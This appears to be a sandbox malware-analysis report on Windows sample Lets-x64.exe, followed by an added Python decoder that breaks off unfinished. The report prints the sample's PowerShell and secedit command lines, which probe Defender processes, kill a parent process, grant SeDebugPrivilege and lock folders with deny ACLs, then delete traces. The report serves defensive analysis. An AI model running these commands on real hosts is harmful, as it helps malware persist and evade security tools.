                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: 7a ed 92 54 93 50 9f 8a e4 a9 96 6d 64 2f 67 c2 fb bb f3 f0 8a e6 b4 93 3e f2 c5 f0 89 72 65 a6 28 d9 ac 63 63 ae ee 31 c3 b4 a5 af c7 42 03 a9 a9 44 47 c7 a6 d0 a7 5f 24 a8 17 96 96 26 81 4a ef 98 62 48 43 53 67 4a 16 62 03 82 e5 a7 6d d0 f9 2f f6 45 29 d0 f4 11 65 6f f7 24 d6 c3 e8 c3 3d cf 1e d1 03 9a bf 39 79 ab ea 81 bc f2 57 2b f3 f9 29 84 32 23 7b e2 02 60 a3 35 57 de 74 0e 36 51 5b ca 54 6f f2 a2 c5 3a 52 d4 43 87 ea ea 77 13 d7 47 df 75 12 b8 7d a6 88 ba 66 45 54 c7 61 71 60 d0 cb 7f 4f c7 6b 2f ea ba 51 29 02 4f 3b 69 2d 90 3a 79 b7 ba 42 a7 9b 1f 24 ac fb f3 ee 62 57 65 54 4f 42 0a e7 7e 4a 12 7a bd 12 2b 06 42 bb b3 2e ac 1c 97 6e 6a 66 96 a7 bb 64 d7 4d 80 3c f5 1d a3 2d 95 09 3d 26 e3 7d 8a 87 5e ea b2 96 5f 52 75 c6 b4 4e 33 15 16 d6 f4 bc
                                                                                                                  Data Ascii: zTPmd/g>re(cc1BDG_$&JbHCSgJbm/E)eo$=9yW+)2#{`5Wt6Q[To:RCwGu}fETaq`Ok/Q)O;i-:yB$bWeTOB~Jz+B.njfdM<-=&}^_RuN3
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: a5 b6 9e 3f cd d6 38 9c 02 79 2b 38 eb 25 bd 54 ef 55 83 28 6f 67 c0 e5 71 04 34 4a 84 4a 42 fb b7 9b 9c 95 be 1e 93 2f 5e 53 ce 4a d7 c9 1b 21 7f 85 ac 95 ad 19 4a e2 04 f7 cf 76 af 87 5a 1f b3 8a f8 2f 22 6e 1e 35 67 93 6e 48 be af 8f 16 b3 f0 e6 3f 3c 8b e9 ae 83 d0 9f af 28 fa 59 62 43 ab cd 16 b2 a7 e0 01 2f f7 a3 bc 2e 92 e8 12 86 74 c0 3a af 2f 9f 6f d9 98 7c 47 83 7c c8 3f 7e 90 39 54 c7 16 dd 9c e7 69 89 8e b0 0c a2 ad 96 b9 41 af 73 53 e7 bb 77 67 ef 26 96 a3 d8 b8 0c a3 6b 45 0f 7f a0 12 73 ab 60 40 88 8a fc 96 e7 be a5 dd 67 e9 fe 2a 4f 7e f3 b1 c3 7c f4 2f 60 8f ee 5e 54 78 c6 ce 87 aa 63 f6 a4 bd a9 ea 77 8c 0f 05 96 46 ed ed e3 c9 87 07 92 8f 3f 7e 81 72 7c 1c f0 b3 8b 0a bd 98 50 6e 2e 45 ec d7 b9 54 1d a7 aa bf d7 d5 33 62 c1 ff 91 dd e3
                                                                                                                  Data Ascii: ?8y+8%TU(ogq4JJB/^SJ!JvZ/"n5gnH?<(YbC/.t:/o|G|?~9TiAsSwg&kEs`@g*O~|/`^TxcwF?~r|Pn.ET3b
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: b7 e8 0a 5f d3 3d f2 c8 6b 45 66 af 1d d4 b5 bf 91 80 12 9b 69 82 65 98 a6 8a 0f e4 51 8a 06 8d a4 6f a6 dc 42 56 7b 69 6f 31 5c 62 8d cc af e2 31 87 11 cb 0a c0 ea 17 83 41 0e aa a0 ce ed 06 24 c7 14 03 65 8a cf 33 4f 96 00 09 1f 30 01 e5 4e 85 3e 65 a9 db 5e f9 81 ca 4e 68 f3 d0 14 2c 66 d1 97 66 a7 94 09 c7 09 c2 ab ae e8 a1 21 57 be 93 6f 2f 20 c5 0a 86 17 4a 04 ef 70 84 e9 fd 5b a6 c1 15 92 a5 a9 19 0f 23 bf 79 d2 9d dd 00 cd 1e 34 f9 30 6a aa c4 29 9a 7d ab 4c e5 26 a2 98 8f ee 6e 8c fb b3 94 1b 0e 6b 75 f4 a5 2d a7 b8 c0 b6 e7 c5 33 86 b9 2f 10 a4 7d c7 ae 86 b6 61 bc 67 78 31 1c 5e 17 49 51 76 f6 a0 0c 71 73 c3 92 ab a4 89 ed 9c 0d 68 52 56 5f 00 ef ce 96 95 76 89 0e aa b9 15 70 b0 82 29 e8 a3 7c ee 68 4b 2b 15 0c d1 af 7d 85 a4 5b 0a 79 77 58 76
                                                                                                                  Data Ascii: _=kEfieQoBV{io1\b1A$e3O0N>e^Nh,ff!Wo/ Jp[#y40j)}L&nku-3/}agx1^IQvqshRV_vp)|hK+}[ywXv
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: 0b 90 84 87 3f a8 63 f3 8e 7d a1 48 3b ad 2c 46 82 e7 f2 fd 73 ac 9b 1b 0f 82 f7 55 d9 35 4e d5 84 93 8e 67 80 77 7c 33 87 57 fb a8 68 c7 99 e9 2c 2f 72 a1 52 e1 1c c0 c9 63 b5 8f 4a ce 5f ee de 5c f3 10 8d e0 34 4f 28 34 ce f0 80 bb cb bb 4e 19 35 ba d7 9e 32 bf cd 42 92 9d 4b 04 19 8e 6c ab 5b a8 9a 59 04 7b 3b 33 5a 60 8f 57 75 06 46 43 80 22 cb 77 5b 7b ca 49 b4 b4 85 5d 68 32 d0 e9 2a d2 29 12 79 2e 20 f3 96 32 76 8b 76 af c9 9f 11 07 67 86 62 15 cb 11 16 8a ed 13 3f 45 7e 4e 20 40 8b 56 f4 65 4d 6b 88 d3 ba 54 1b 37 dc 52 71 c8 42 5e 50 87 69 6c 61 06 c3 7d f7 4e 89 40 bb 66 35 a9 44 75 e2 2d c1 c0 12 84 a0 7d b8 57 98 6b be d0 1b 3e 80 d7 6e 01 f0 ff d3 07 f2 25 93 10 97 23 b7 4f 53 63 32 2e 90 ca ab 9a 59 24 a0 69 84 ee b8 a9 59 05 a7 6b 1f 41 31
                                                                                                                  Data Ascii: ?c}H;,FsU5Ngw|3Wh,/rRcJ_\4O(4N52BKl[Y{;3Z`WuFC"w[{I]h2*)y. 2vvgb?E~N @VeMkT7RqB^Pila}N@f5Du-}Wk>n%#OSc2.Y$iYkA1


Target ID: 0
Start time: 10:09:08
Start date: 29/12/2024
Path: C:\Users\user\Desktop\Lets-x64.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Lets-x64.exe"
Imagebase: 0x7ff668850000
File size: 21'353'869 bytes
MD5 hash: A702CC254B31FBC4A5EC45FA16573521
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:09:09
Start date: 29/12/2024
Path: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Imagebase: 0x7ff68b8e0000
File size: 5'153'280 bytes
MD5 hash: 2A7D5F8D3FB4AB753B226FD88D31453B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 3
Start time: 10:09:14
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 10:09:14
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 10:09:14
Start date: 29/12/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase: 0x7ff7ab390000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 10:09:17
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 10:09:17
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 10:09:18
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 10:09:18
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                  Target ID:10
                                                                                                                  Start time:10:09:19
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:11
                                                                                                                  Start time:10:09:19
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:10:09:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:10:09:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:10:09:33
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                                                                                                                  Imagebase:0x7ff784360000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:16
                                                                                                                  Start time:10:09:33
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                                                                                                                  Imagebase:0xdb0000
                                                                                                                  File size:2'766'808 bytes
                                                                                                                  MD5 hash:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  Has exited:false

                                                                                                                  Target ID:18
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:19
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:20
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:24
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true
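
The four PowerShell command lines above (target IDs 18, 19, 21 and 24) share one technique: write a secedit security template (.inf) to %TEMP%, apply it with secedit.exe /configure, then delete the .inf, .sdb and .log so only the command line remains as evidence. Three carry the template as a Set-Content string array; target 21 carries the same template as a base64 blob. The Python below is a worked example added here, not part of the Joe Sandbox report or of the sample: it recovers the template from either shape of command line, decodes the base64 variant back to its UTF-16 text, and expands the [Privilege Rights] entry and the [File Security] SDDL string into names. CMD_PLAIN and CMD_B64 are constructed copies of the report's command lines (trimmed to the parts that matter, with the \" quote escaping kept as the report renders it); the SDDL and SID tables are standard Windows values; the function names are this example's own.

```python
"""Recover and decode the secedit templates from this report's PowerShell command lines.

Added example, not part of the Joe Sandbox report or of the sample: CMD_PLAIN and CMD_B64
are constructed copies of the command lines of target IDs 18 and 21, trimmed; the SDDL
and SID tables below are standard Windows values.
"""
import base64
import re

CMD_PLAIN = r'''powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]',
'signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]',
'\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode;
 secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /quiet"'''.replace("\n", "")

CMD_B64 = (
    "powershell.exe -NoProfile -C \"[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), "
    "[Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoA"
    "cwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABS"
    "AGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); "
    "secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /quiet\""
)

SDDL_ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED"}
SDDL_ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT",
                  "NP": "NO_PROPAGATE_INHERIT", "IO": "INHERIT_ONLY"}
SDDL_DACL_FLAGS = {"P": "PROTECTED", "AR": "AUTO_INHERIT_REQ", "AI": "AUTO_INHERITED"}
# Rights codes as they apply to a file-system object. "DT" is the directory-service
# DELETE_TREE code (bit 0x40); on a folder that same bit is FILE_DELETE_CHILD.
SDDL_RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
    "FX": "FILE_GENERIC_EXECUTE", "DT": "FILE_DELETE_CHILD",
}
SDDL_TRUSTEES = {"WD": "Everyone (S-1-1-0)", "SY": "LOCAL SYSTEM (S-1-5-18)",
                 "BA": "BUILTIN\\Administrators (S-1-5-32-544)"}
WELL_KNOWN_SIDS = {"S-1-5-18": "LOCAL SYSTEM", "S-1-5-32-544": "BUILTIN\\Administrators",
                   "S-1-1-0": "Everyone"}


def recover_inf(cmdline):
    """Return the template lines the command line writes to %TEMP%, for both shapes in the report."""
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", cmdline)
    if m:
        # Shape 2 (target ID 21): the whole file as base64. The bytes start with the
        # FF FE BOM, so the utf-16 codec selects little-endian and drops the BOM.
        return base64.b64decode(m.group(1)).decode("utf-16").splitlines()
    m = re.search(r"Set-Content -Value @\((.*?)\)\s+-Path", cmdline)
    if not m:
        raise ValueError("no secedit template in command line")
    # Shape 1 (target IDs 18, 19, 24): a PowerShell array of single-quoted strings,
    # one per file line, with embedded double quotes shown as \" in the report.
    return [item.replace('\\"', '"') for item in re.findall(r"'([^']*)'", m.group(1))]


def parse_inf(lines):
    """Group the [Section] / entry lines of a security template by section name."""
    sections, current = {}, None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def _pairs(s):
    """Split an SDDL flag/rights string into its two-letter codes."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def decode_sddl(sddl):
    """Expand a DACL-only SDDL string such as D:AR(D;OICI;DTSDRCWD;;;WD) into names."""
    m = re.fullmatch(r"D:((?:P|AR|AI)*)((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("unsupported SDDL: " + sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(2)):
        ace_type, flags, rights, _obj_guid, _inherit_guid, trustee = ace.split(";")
        aces.append({
            "type": SDDL_ACE_TYPES.get(ace_type, ace_type),
            "flags": [SDDL_ACE_FLAGS.get(f, f) for f in _pairs(flags)],
            "rights": [SDDL_RIGHTS.get(r, r) for r in _pairs(rights)],
            "trustee": SDDL_TRUSTEES.get(trustee, trustee),
        })
    dacl_flags = [SDDL_DACL_FLAGS[f] for f in re.findall(r"AR|AI|P", m.group(1))]
    return {"dacl_flags": dacl_flags, "aces": aces}


def triage(cmdline):
    """Describe what applying the recovered template changes on the host."""
    sections = parse_inf(recover_inf(cmdline))
    privileges = {}
    for entry in sections.get("Privilege Rights", []):
        name, _, holders = entry.partition("=")
        # The template lists the complete set of holders; "*" prefixes a literal SID.
        privileges[name.strip()] = [WELL_KNOWN_SIDS.get(h.strip().lstrip("*"), h.strip())
                                    for h in holders.split(",") if h.strip()]
    file_security = []
    for entry in sections.get("File Security", []):
        path, mode, sddl = (field.strip().strip('"') for field in entry.split(",", 2))
        file_security.append({"path": path, "mode": int(mode), "dacl": decode_sddl(sddl)})
    return {"privileges": privileges, "file_security": file_security}


if __name__ == "__main__":
    import json
    for label, cmd in (("target ID 18", CMD_PLAIN), ("target ID 21", CMD_B64)):
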